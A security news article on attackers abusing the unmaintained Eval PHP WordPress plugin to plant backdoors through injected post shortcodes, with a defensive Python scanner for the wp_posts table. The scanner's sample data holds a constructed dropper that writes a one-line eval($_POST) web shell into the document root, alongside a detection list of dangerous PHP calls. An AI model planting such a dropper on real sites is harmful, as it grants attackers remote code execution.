A recent report from Sucuri has revealed that threat actors are leveraging a legitimate but long-abandoned WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code into the pages and posts of a WordPress site; that code is then executed every time the post is opened in a web browser.

Eval PHP has not received an update in 11 years, yet statistics gathered by WordPress show that it is installed on over 8,000 websites. Its downloads have skyrocketed from one or two per day on average since September 2022 to 6,988 on March 30, 2023. On April 23, 2023, alone, it was downloaded 2,140 times, and it has racked up 23,110 downloads over the past seven days. A plugin that nobody is maintaining suddenly being installed thousands of times a day is itself a signal that attackers, not site owners, are driving the installs.

GoDaddy-owned Sucuri said it observed malicious code injected into the "wp_posts" table of infected websites' databases, the table that stores a site's posts, pages, and navigation menu information. The requests originate from three different IP addresses based in Russia. Because Eval PHP evaluates whatever sits inside its shortcode on every page load, a single injected post is enough to re-create the backdoor each time it is rendered, so deleting the dropped file alone does not clean the site.

"This code is quite simple: It uses the file_put_contents function to create a PHP script into the docroot of the website with the specified remote code execution backdoor," security researcher Ben Martin said.
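The injection described above lives in post content, so a defender can hunt for it directly in the wp_posts table rather than only in the filesystem. The following scanner is an added example written for this article, not code from Sucuri, the Eval PHP plugin, or the attackers: it looks for the plugin's [evalphp] shortcode in each row, flags PHP calls that have no business in a post body, and notes whether the shortcode writes a file into the document root, which is the dropper behaviour the report describes. The sample rows, the dropper.php filename and the list of suspicious calls are constructed for illustration and are not indicators taken from the report.

```python
import re
from typing import Dict, List, Optional

# Eval PHP executes whatever sits between [evalphp] and [/evalphp] each time the
# post is rendered. The same string outside the shortcode is inert text, so the
# scanner only examines shortcode bodies.
SHORTCODE_RE = re.compile(r"\[evalphp\](.*?)\[/evalphp\]", re.IGNORECASE | re.DOTALL)

# PHP calls that should never appear inside post content. This is an assumed,
# illustrative list; extend it for your environment.
SUSPICIOUS_CALLS = (
    "file_put_contents", "fwrite", "eval(", "assert(", "base64_decode",
    "system(", "shell_exec", "passthru", "exec(", "gzinflate", "str_rot13",
)

# Markers that the write target is the site's document root, matching the
# report's description of a dropper that plants a PHP file in the docroot.
DOCROOT_MARKERS = ("DOCUMENT_ROOT", "ABSPATH", "__DIR__")

# Constructed rows mimicking the columns a defender would pull with
#   SELECT ID, post_status, post_content FROM wp_posts
#   WHERE post_content LIKE '%[evalphp]%';
# None of this is real data from a compromised site. Row 2 mimics a dropper
# hidden in a draft; row 3 is a benign use of the plugin; row 4 only mentions
# a dangerous function in prose, outside any shortcode.
SAMPLE_WP_POSTS: List[Dict] = [
    {"ID": 1, "post_status": "publish",
     "post_content": "<p>Welcome to our site!</p>"},
    {"ID": 2, "post_status": "draft",
     "post_content": "[evalphp] file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/dropper.php', "
                     "'<?php @eval($_POST[\"c\"]); ?>'); [/evalphp]"},
    {"ID": 3, "post_status": "publish",
     "post_content": "<p>Copyright [evalphp] echo date('Y'); [/evalphp]</p>"},
    {"ID": 4, "post_status": "publish",
     "post_content": "<p>Never call file_put_contents() from a template.</p>"},
]


def scan_post(row: Dict) -> Optional[Dict]:
    """Return a finding for a post that contains an [evalphp] shortcode, else None."""
    bodies = SHORTCODE_RE.findall(row["post_content"])
    if not bodies:
        return None
    code = "\n".join(bodies)
    calls = [c for c in SUSPICIOUS_CALLS if c in code]
    writes_docroot = "file_put_contents" in code and any(m in code for m in DOCROOT_MARKERS)
    return {
        "post_id": row["ID"],
        "post_status": row["post_status"],
        "suspicious_calls": calls,
        "writes_to_docroot": writes_docroot,
        # Any shortcode deserves review on a site that should not run PHP from
        # posts; dangerous calls raise it to high.
        "severity": "high" if calls else "review",
    }


def scan_wp_posts(rows: List[Dict]) -> List[Dict]:
    """Scan every row and return only the posts that carry an [evalphp] shortcode."""
    return [f for f in (scan_post(r) for r in rows) if f is not None]


if __name__ == "__main__":
    for finding in scan_wp_posts(SAMPLE_WP_POSTS):
        print(finding)
```

Run the scanner against rows exported from the real wp_posts table; drafts and revisions must be included, because a draft is never displayed to visitors yet its shortcode still executes when an attacker requests it, and a found dropper means the file it wrote in the docroot has to be located and removed as well.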
This is a serious issue that WordPress users need to be aware of. If you have the Eval PHP plugin installed on your website, remove it immediately: it has had no updates in 11 years and its only function is to execute arbitrary PHP from post content. Removing the plugin is not enough on its own, though. Check the wp_posts table, including drafts, for injected shortcodes, and check the document root for PHP files you did not put there, since that is where the observed dropper writes its backdoor. More generally, keep your plugins and themes up to date, and uninstall any that are no longer maintained, to avoid falling victim to these kinds of attacks.